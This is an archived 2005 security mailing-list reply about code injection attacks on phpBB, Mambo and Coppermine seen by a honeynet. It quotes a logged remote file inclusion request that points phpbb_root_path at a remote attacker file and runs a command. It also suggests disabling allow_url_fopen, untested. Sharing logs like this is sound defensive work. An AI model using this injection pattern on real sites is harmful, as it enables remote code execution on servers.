WebApp Sec mailing list archives
Re: Mambo, Coppermine and PHPBB Attacks
From: Paul Laudanski <zx () castlecops com>
Date: Mon, 19 Dec 2005 18:24:14 -0500 (EST)
On Mon, 19 Dec 2005, Mark Ryan del Moral Talabis wrote:
Our honeynet has been picking up an increase in the number of code injection attacks in the past few days. Attacks are primarily directed to several popular open source applications: Mambo, Coppermine and PHPBB. Analysis: http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17
Nice catch. I checked my logs and found these which appear to be the valid phpbb injection request: 81.215.110.24 - - [19/Dec/2005:07:20:30 -0500] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.frauenfinanzzentrum.at/tool25.dat?&cmd=id HTTP/1.0" Notice the admin_styles.php is written out once. I would suspect that disabling allow_url_fopen directive in php.ini would disallow such a request to execute. This would prevent resources other than files to not be included. But I haven't tested. -- Paul Laudanski, Microsoft MVP Windows-Security [cal] http://events.castlecops.com [de] http://de.castlecops.com [en] http://castlecops.com [wiki] http://wiki.castlecops.com [family] http://cuddlesnkisses.com
Current thread:
- Mambo, Coppermine and PHPBB Attacks Mark Ryan del Moral Talabis (Dec 18)
- RE: Mambo, Coppermine and PHPBB Attacks John Cobb (Dec 19)
- Re: Mambo, Coppermine and PHPBB Attacks Paul Laudanski (Dec 20)
- Re: Mambo, Coppermine and PHPBB Attacks Tofik Suleymanov (Dec 20)
- Re: Mambo, Coppermine and PHPBB Attacks Paul Laudanski (Dec 21)
- Re: Mambo, Coppermine and PHPBB Attacks Yasuo Ohgaki (Dec 24)
- Re: Mambo, Coppermine and PHPBB Attacks Paul Laudanski (Dec 24)
- Re: Mambo, Coppermine and PHPBB Attacks Yasuo Ohgaki (Dec 25)
- Re: Mambo, Coppermine and PHPBB Attacks Paul Laudanski (Dec 25)
- Re: Mambo, Coppermine and PHPBB Attacks Yasuo Ohgaki (Dec 29)
- Re: Mambo, Coppermine and PHPBB Attacks ascii (Dec 29)
- Re: Mambo, Coppermine and PHPBB Attacks Andrew van der Stock (Dec 29)
- Re: Mambo, Coppermine and PHPBB Attacks Tofik Suleymanov (Dec 20)
- Re: Mambo, Coppermine and PHPBB Attacks Jack Tennessee (Dec 22)